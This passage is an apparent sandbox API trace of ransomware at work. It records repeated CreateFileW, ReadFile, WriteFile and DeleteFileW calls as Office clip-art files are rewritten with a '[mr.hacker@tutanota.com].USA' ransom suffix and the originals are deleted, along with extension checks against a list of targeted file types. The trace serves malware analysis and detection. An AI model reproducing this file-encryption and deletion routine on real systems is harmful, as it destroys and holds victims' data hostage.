"c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00154_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0053.278] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.278] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.278] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00154_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0053.279] GetLastError () returned 0x0 [0053.279] ReadFile (in: hFile=0x208, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x14c3, lpOverlapped=0x0) returned 1 [0053.280] WriteFile (in: hFile=0x160, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x14d0, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x14d0, lpOverlapped=0x0) returned 1 [0053.282] ReadFile (in: hFile=0x208, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0053.282] WriteFile (in: hFile=0x160, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.282] SetEndOfFile (hFile=0x160) returned 1 [0053.282] CloseHandle (hObject=0x160) returned 1 [0053.282] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.282] SetEndOfFile (hFile=0x208) returned 1 [0053.283] CloseHandle (hObject=0x208) returned 1 [0053.283] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0053.283] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00154_.gif")) returned 1 [0053.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 63 [0053.283] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 63 [0053.283] lstrlenW (lpString=".doc") returned 4 [0053.283] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.283] lstrlenW (lpString=".docx") returned 5 [0053.283] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.283] lstrlenW (lpString=".pdf") returned 4 [0053.283] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.283] lstrlenW (lpString=".xls") returned 4 [0053.284] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.284] lstrlenW (lpString=".xlsx") returned 5 [0053.284] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.284] lstrlenW (lpString=".ppt") returned 4 [0053.284] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 63 [0053.284] lstrlenW (lpString=".zip") returned 4 [0053.284] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.284] lstrlenW (lpString=".rar") returned 4 [0053.284] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.284] lstrlenW (lpString=".bz2") returned 4 [0053.284] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.284] lstrlenW (lpString=".7z") returned 3 [0053.284] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 63 [0053.284] lstrlenW (lpString=".dbf") returned 4 [0053.284] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 63 [0053.284] lstrlenW (lpString=".1cd") returned 4 [0053.284] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.284] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 63 [0053.284] lstrlenW (lpString=".jpg") returned 4 [0053.284] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.284] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=4955) returned 1 [0053.284] CloseHandle (hObject=0x208) returned 1 [0053.285] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00157_.gif")) returned 0x20 [0053.285] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00157_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0053.285] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00157_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0053.285] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.285] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.285] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00157_.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0053.285] GetLastError () returned 0x0 [0053.285] ReadFile (in: hFile=0x208, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x135b, lpOverlapped=0x0) returned 1 [0053.287] WriteFile (in: hFile=0x160, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x1360, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x1360, lpOverlapped=0x0) returned 1 [0053.288] ReadFile (in: hFile=0x208, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0053.288] WriteFile (in: hFile=0x160, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.288] SetEndOfFile (hFile=0x160) returned 1 [0053.288] CloseHandle (hObject=0x160) returned 1 [0053.288] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.288] SetEndOfFile (hFile=0x208) returned 1 [0053.628] CloseHandle (hObject=0x208) returned 1 [0053.634] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0053.647] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00157_.gif")) returned 1 [0053.654] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 63 [0053.660] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 63 [0053.660] lstrlenW (lpString=".doc") returned 4 [0053.660] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.661] lstrlenW (lpString=".docx") returned 5 [0053.661] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.661] lstrlenW (lpString=".pdf") returned 4 [0053.661] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.661] lstrlenW (lpString=".xls") returned 4 [0053.661] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.661] lstrlenW (lpString=".xlsx") returned 5 [0053.661] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.661] lstrlenW (lpString=".ppt") returned 4 [0053.661] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.661] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 63 [0053.661] lstrlenW (lpString=".zip") returned 4 [0053.661] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.661] lstrlenW (lpString=".rar") returned 4 [0053.661] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.661] lstrlenW (lpString=".bz2") returned 4 [0053.661] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.661] lstrlenW (lpString=".7z") returned 3 [0053.661] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.661] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 63 [0053.661] lstrlenW (lpString=".dbf") returned 4 [0053.661] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.661] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 63 [0053.661] lstrlenW (lpString=".1cd") returned 4 [0053.661] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.661] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00157_.GIF") returned 63 [0053.661] lstrlenW (lpString=".jpg") returned 4 [0053.661] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.662] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.662] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.662] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01039_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0053.662] GetLastError () returned 0x0 [0053.662] ReadFile (in: hFile=0x228, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0xd10, lpOverlapped=0x0) returned 1 [0053.664] WriteFile (in: hFile=0x1b4, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xd20, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xd20, lpOverlapped=0x0) returned 1 [0053.665] ReadFile (in: hFile=0x228, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0053.665] WriteFile (in: hFile=0x1b4, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.665] SetEndOfFile (hFile=0x1b4) returned 1 [0053.665] CloseHandle (hObject=0x1b4) returned 1 [0053.665] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.665] SetEndOfFile (hFile=0x228) returned 1 [0053.666] CloseHandle (hObject=0x228) returned 1 [0053.666] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0053.666] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01039_.wmf")) returned 1 [0053.666] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 63 [0053.666] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 63 [0053.666] lstrlenW (lpString=".doc") returned 4 [0053.666] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.667] lstrlenW (lpString=".docx") returned 5 [0053.667] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.667] lstrlenW (lpString=".pdf") returned 4 [0053.667] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.667] lstrlenW (lpString=".xls") returned 4 [0053.667] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.667] lstrlenW (lpString=".xlsx") returned 5 [0053.667] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.667] lstrlenW (lpString=".ppt") returned 4 [0053.667] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.667] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 63 [0053.667] lstrlenW (lpString=".zip") returned 4 [0053.667] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.667] lstrlenW (lpString=".rar") returned 4 [0053.667] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.667] lstrlenW (lpString=".bz2") returned 4 [0053.667] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.667] lstrlenW (lpString=".7z") returned 3 [0053.667] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.667] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 63 [0053.667] lstrlenW (lpString=".dbf") returned 4 [0053.667] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.667] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 63 [0053.667] lstrlenW (lpString=".1cd") returned 4 [0053.667] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.667] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 63 [0053.667] lstrlenW (lpString=".jpg") returned 4 [0053.667] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.668] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.668] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.668] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01044_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0053.668] GetLastError () returned 0x0 [0053.668] ReadFile (in: hFile=0x228, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x63c, lpOverlapped=0x0) returned 1 [0053.669] WriteFile (in: hFile=0x1b4, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x640, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x640, lpOverlapped=0x0) returned 1 [0053.670] ReadFile (in: hFile=0x228, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0053.670] WriteFile (in: hFile=0x1b4, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.670] SetEndOfFile (hFile=0x1b4) returned 1 [0053.670] CloseHandle (hObject=0x1b4) returned 1 [0053.670] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.670] SetEndOfFile (hFile=0x228) returned 1 [0053.671] CloseHandle (hObject=0x228) returned 1 [0053.671] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0053.671] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01044_.wmf")) returned 1 [0053.672] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 63 [0053.672] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 63 [0053.672] lstrlenW (lpString=".doc") returned 4 [0053.672] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.672] lstrlenW (lpString=".docx") returned 5 [0053.672] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.672] lstrlenW (lpString=".pdf") returned 4 [0053.672] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.672] lstrlenW (lpString=".xls") returned 4 [0053.672] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.672] lstrlenW (lpString=".xlsx") returned 5 [0053.672] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.672] lstrlenW (lpString=".ppt") returned 4 [0053.672] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.672] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 63 [0053.672] lstrlenW (lpString=".zip") returned 4 [0053.672] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.672] lstrlenW (lpString=".rar") returned 4 [0053.672] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.672] lstrlenW (lpString=".bz2") returned 4 [0053.672] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.672] lstrlenW (lpString=".7z") returned 3 [0053.672] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.672] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 63 [0053.672] lstrlenW (lpString=".dbf") returned 4 [0053.672] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.672] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 63 [0053.672] lstrlenW (lpString=".1cd") returned 4 [0053.672] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.672] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01044_.WMF") returned 63 [0053.673] lstrlenW (lpString=".jpg") returned 4 [0053.673] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.673] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.673] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.674] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01060_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0053.674] GetLastError () returned 0x0 [0053.674] ReadFile (in: hFile=0x228, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x1f20, lpOverlapped=0x0) returned 1 [0053.675] WriteFile (in: hFile=0x1b4, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x1f30, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x1f30, lpOverlapped=0x0) returned 1 [0053.676] ReadFile (in: hFile=0x228, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0053.676] WriteFile (in: hFile=0x1b4, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.676] SetEndOfFile (hFile=0x1b4) returned 1 [0053.676] CloseHandle (hObject=0x1b4) returned 1 [0053.676] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.677] SetEndOfFile (hFile=0x228) returned 1 [0053.677] CloseHandle (hObject=0x228) returned 1 [0053.677] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0053.678] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01060_.wmf")) returned 1 [0053.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 63 [0053.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 63 [0053.678] lstrlenW (lpString=".doc") returned 4 [0053.678] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.678] lstrlenW (lpString=".docx") returned 5 [0053.678] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.678] lstrlenW (lpString=".pdf") returned 4 [0053.678] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.678] lstrlenW (lpString=".xls") returned 4 [0053.678] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.678] lstrlenW (lpString=".xlsx") returned 5 [0053.678] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.678] lstrlenW (lpString=".ppt") returned 4 [0053.678] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 63 [0053.678] lstrlenW (lpString=".zip") returned 4 [0053.678] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.678] lstrlenW (lpString=".rar") returned 4 [0053.678] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.678] lstrlenW (lpString=".bz2") returned 4 [0053.678] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.678] lstrlenW (lpString=".7z") returned 3 [0053.678] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 63 [0053.679] lstrlenW (lpString=".dbf") returned 4 [0053.679] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.679] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 63 [0053.679] lstrlenW (lpString=".1cd") returned 4 [0053.679] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.679] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 63 [0053.679] lstrlenW (lpString=".jpg") returned 4 [0053.679] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.679] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.679] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0053.679] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01084_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0053.679] GetLastError () returned 0x0 [0053.679] ReadFile (in: hFile=0x228, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x728, 